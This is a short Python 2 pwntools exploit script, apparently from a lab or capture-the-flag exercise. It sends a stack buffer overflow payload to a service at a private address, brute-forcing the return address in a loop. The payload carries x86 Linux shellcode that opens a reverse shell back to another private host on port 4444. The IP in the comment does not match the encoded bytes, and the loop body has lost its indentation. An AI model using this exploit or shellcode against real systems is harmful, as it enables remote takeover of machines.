from pwn import *
import sys
# gdb-peda
# shellcode generate x86/linux 4444 192.168.3.136
shellcode = (
"\x31\xdb\x53\x43\x53\x6a\x02\x6a\x66\x58\x89\xe1\xcd\x80\x93\x59"
"\xb0\x3f\xcd\x80\x49\x79\xf9\x5b\x5a\x68\xc0\xa8\x03\x80\x66\x68"
"\x11\x5c\x43\x66\x53\x89\xe1\xb0\x66\x50\x51\x53\x89\xe1\x43\xcd"
"\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53"
"\x89\xe1\xb0\x0b\xcd\x80"
)
for x in range(1, 0xff+1):
io = remote("192.168.3.137", 6666)
addr = chr(x)+"\xfb\xff\xbf"
payload = "A"*44
payload += addr
payload += "\x90"*4+shellcode
print "addr : " + str(hex(u32(addr)))
io.sendline(payload)
io.close()